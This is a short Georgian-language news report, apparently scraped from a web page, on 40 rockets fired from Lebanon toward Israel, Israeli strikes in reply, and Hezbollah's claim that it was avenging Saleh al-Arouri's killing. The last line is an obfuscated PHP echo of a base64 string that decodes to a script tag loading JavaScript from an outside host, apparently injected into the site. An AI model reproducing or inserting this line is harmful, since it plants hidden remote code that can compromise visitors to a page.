celsiusi
ავერსი საქკაბელი

ისრაელის ტერიტორიის მიმართულებით ლიბანიდან 40 რაკეტა ისროლეს.

ისრაელის მედიის ინფორმაციით, მერონის მთის ზონაში აფეთქებები მოხდა. ისრაელის ჩრდილოეთ საზღვართან ახლოს მდებარე 90 დასახლებაში განგაშის სიგნალების ჩაირთო.

მსხვერპლისა და ზარალის შესახებ ინფორმაცია არ ვრცელდება. რაკეტების გაშვების შემდეგ სამხრეთ ლიბანის ტერიტორია ისრაელის თავდაცვის ძალებმა დაბომბეს.

რაკეტების გაშვებაზე პასუხისმგებლობა ლიბანურმა შიიტურმა დაჯგუფება „ჰეზბოლამ“ აიღო. დაჯგუფების განცხადებაში აღნიშნულია, რომ ეს არის პირველადი პასუხი გასულ კვირას „ჰამასის“ ერთ-ერთი ლიდერის, სალეჰ ალ-არურის მკვლელობაზე.

242
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");